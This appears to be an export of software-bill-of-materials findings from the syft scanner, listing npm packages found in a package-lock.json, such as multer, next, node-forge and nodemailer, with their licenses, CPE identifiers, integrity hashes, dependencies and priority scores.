- schemaVersion: 1.2.0
|
|
id: ffedfc57a9f39743
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: multer 1.4.5-lts.2'
|
|
title: multer 1.4.5-lts.2
|
|
description: 'Package discovered: multer 1.4.5-lts.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 775c553ab4f0a485
|
|
name: multer
|
|
version: 1.4.5-lts.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:multer:multer:1.4.5-lts.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/multer@1.4.5-lts.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/multer/-/multer-1.4.5-lts.2.tgz
|
|
integrity: sha512-VzGiVigcG9zUAoCNU+xShztrlr1auZOlurXynNvO9GiWD1/mTBbUljOKY+qMeazBqXgRnjzeEgJI/wyjJUHg9A==
|
|
dependencies:
|
|
append-field: ^1.0.0
|
|
busboy: ^1.0.0
|
|
concat-stream: ^1.5.2
|
|
mkdirp: ^0.5.4
|
|
object-assign: ^4.1.1
|
|
type-is: ^1.6.4
|
|
xtend: ^4.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9d7c97f3f3cb9ec0
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: mz 2.7.0'
|
|
title: mz 2.7.0
|
|
description: 'Package discovered: mz 2.7.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 96c78782a0a6a6e8
|
|
name: mz
|
|
version: 2.7.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:mz:mz:2.7.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/mz@2.7.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/mz/-/mz-2.7.0.tgz
|
|
integrity: sha512-z81GNO7nnYMEhrGh9LeymoE4+Yr0Wn5McHIZMK5cfQCl+NDX08sCZgUc9/6MHni9IWuFLm1Z3HTCXu2z9fN62Q==
|
|
dependencies:
|
|
any-promise: ^1.0.0
|
|
object-assign: ^4.0.1
|
|
thenify-all: ^1.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 545c4a29aa435f71
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: nanoid 3.3.11'
|
|
title: nanoid 3.3.11
|
|
description: 'Package discovered: nanoid 3.3.11'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: fc2d97a12d1a4dda
|
|
name: nanoid
|
|
version: 3.3.11
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:nanoid_project:nanoid:3.3.11:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/nanoid@3.3.11
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/nanoid/-/nanoid-3.3.11.tgz
|
|
integrity: sha512-N8SpfPUnUp1bK+PMYW8qSWdl9U+wwNWI4QKxOYDy9JAro3WMX7p2OeVRF9v+347pnakNevPmiHhNmZ2HbFA76w==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 932afc2de4b38fa5
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: negotiator 0.6.3'
|
|
title: negotiator 0.6.3
|
|
description: 'Package discovered: negotiator 0.6.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 312bd96694b2eb5b
|
|
name: negotiator
|
|
version: 0.6.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:negotiator:negotiator:0.6.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/negotiator@0.6.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/negotiator/-/negotiator-0.6.3.tgz
|
|
integrity: sha512-+EUsqGPLsM+j/zdChZjsnX51g4XrHFOIXwfnCVPGlQk/k5giakcKsuxCObBRu6DSm9opw/O6slWbJdghQM4bBg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d346e21d42fdf73e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: next 14.2.3'
|
|
title: next 14.2.3
|
|
description: 'Package discovered: next 14.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a9792237818f8415
|
|
name: next
|
|
version: 14.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:vercel:next.js:14.2.3:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/next@14.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/next/-/next-14.2.3.tgz
|
|
integrity: sha512-dowFkFTR8v79NPJO4QsBUtxv0g9BrS/phluVpMAt2ku7H+cbcBJlopXjkWlwxrk/xGqMemr7JkGPGemPrLLX7A==
|
|
dependencies:
|
|
'@next/env': 14.2.3
|
|
'@swc/helpers': 0.5.5
|
|
busboy: 1.6.0
|
|
caniuse-lite: ^1.0.30001579
|
|
graceful-fs: ^4.2.11
|
|
postcss: 8.4.31
|
|
styled-jsx: 5.1.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 35dad46b81d74be4
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: node-cron 3.0.3'
|
|
title: node-cron 3.0.3
|
|
description: 'Package discovered: node-cron 3.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 5c4492e68f441264
|
|
name: node-cron
|
|
version: 3.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:node-cron:node-cron:3.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:node-cron:node_cron:3.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:node_cron:node-cron:3.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:node_cron:node_cron:3.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:node:node-cron:3.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:node:node_cron:3.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/node-cron@3.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/node-cron/-/node-cron-3.0.3.tgz
|
|
integrity: sha512-dOal67//nohNgYWb+nWmg5dkFdIwDm8EpeGYMekPMrngV3637lqnX0lbUcCtgibHTz6SEz7DAIjKvKDFYCnO1A==
|
|
dependencies:
|
|
uuid: 8.3.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 5d72f54e4946a64f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: node-fetch 2.7.0'
|
|
title: node-fetch 2.7.0
|
|
description: 'Package discovered: node-fetch 2.7.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 71294da0e67ef2a3
|
|
name: node-fetch
|
|
version: 2.7.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:node-fetch_project:node-fetch:2.7.0:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/node-fetch@2.7.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz
|
|
integrity: sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==
|
|
dependencies:
|
|
whatwg-url: ^5.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2cbaa504cc478c46
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: node-forge 1.4.0'
|
|
title: node-forge 1.4.0
|
|
description: 'Package discovered: node-forge 1.4.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c1e5f20287afef44
|
|
name: node-forge
|
|
version: 1.4.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: (BSD-3-Clause OR GPL-2.0)
|
|
spdxExpression: (BSD-3-Clause OR GPL-2.0)
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:digitalbazaar:forge:1.4.0:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/node-forge@1.4.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/node-forge/-/node-forge-1.4.0.tgz
|
|
integrity: sha512-LarFH0+6VfriEhqMMcLX2F7SwSXeWwnEAJEsYm5QKWchiVYVvJyV9v7UDvUv+w5HO23ZpQTXDv/GxdDdMyOuoQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c9ae4bba0c53507d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: node-releases 2.0.38'
|
|
title: node-releases 2.0.38
|
|
description: 'Package discovered: node-releases 2.0.38'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 157e4f935702d7be
|
|
name: node-releases
|
|
version: 2.0.38
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:node-releases:node-releases:2.0.38:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:node-releases:node_releases:2.0.38:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:node_releases:node-releases:2.0.38:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:node_releases:node_releases:2.0.38:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:node:node-releases:2.0.38:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:node:node_releases:2.0.38:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/node-releases@2.0.38
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/node-releases/-/node-releases-2.0.38.tgz
|
|
integrity: sha512-3qT/88Y3FbH/Kx4szpQQ4HzUbVrHPKTLVpVocKiLfoYvw9XSGOX2FmD2d6DrXbVYyAQTF2HeF6My8jmzx7/CRw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b468b7afcd57f5e8
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: nodemailer 6.10.1'
|
|
title: nodemailer 6.10.1
|
|
description: 'Package discovered: nodemailer 6.10.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: bdc7a63994d0b28a
|
|
name: nodemailer
|
|
version: 6.10.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT-0
|
|
spdxExpression: MIT-0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:nodemailer:nodemailer:6.10.1:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/nodemailer@6.10.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/nodemailer/-/nodemailer-6.10.1.tgz
|
|
integrity: sha512-Z+iLaBGVaSjbIzQ4pX6XV41HrooLsQ10ZWPUehGmuantvzWoDVBnmsdUcOIDM1t+yPor5pDhVlDESgOMEGxhHA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: eca5920a6d6c920a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: nopt 7.2.1'
|
|
title: nopt 7.2.1
|
|
description: 'Package discovered: nopt 7.2.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 47f001cd3ecd3ee8
|
|
name: nopt
|
|
version: 7.2.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:nopt:nopt:7.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/nopt@7.2.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/nopt/-/nopt-7.2.1.tgz
|
|
integrity: sha512-taM24ViiimT/XntxbPyJQzCG+p4EKOpgD3mxFwW38mGjVUrfERQOeY4EDHjdnptttfHuHQXFx+lTP08Q+mLa/w==
|
|
dependencies:
|
|
abbrev: ^2.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b6fa9eec1e273eef
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: normalize-path 3.0.0'
|
|
title: normalize-path 3.0.0
|
|
description: 'Package discovered: normalize-path 3.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 86c9c8fe4da1b72f
|
|
name: normalize-path
|
|
version: 3.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:normalize-path:normalize-path:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:normalize-path:normalize_path:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:normalize_path:normalize-path:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:normalize_path:normalize_path:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:normalize:normalize-path:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:normalize:normalize_path:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/normalize-path@3.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz
|
|
integrity: sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0c9db30b81ebd770
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: normalize-svg-path 1.1.0'
|
|
title: normalize-svg-path 1.1.0
|
|
description: 'Package discovered: normalize-svg-path 1.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2e420341fd4164af
|
|
name: normalize-svg-path
|
|
version: 1.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:normalize-svg-path:normalize-svg-path:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:normalize-svg-path:normalize_svg_path:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:normalize_svg_path:normalize-svg-path:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:normalize_svg_path:normalize_svg_path:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:normalize-svg:normalize-svg-path:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:normalize-svg:normalize_svg_path:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:normalize_svg:normalize-svg-path:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:normalize_svg:normalize_svg_path:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:normalize:normalize-svg-path:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
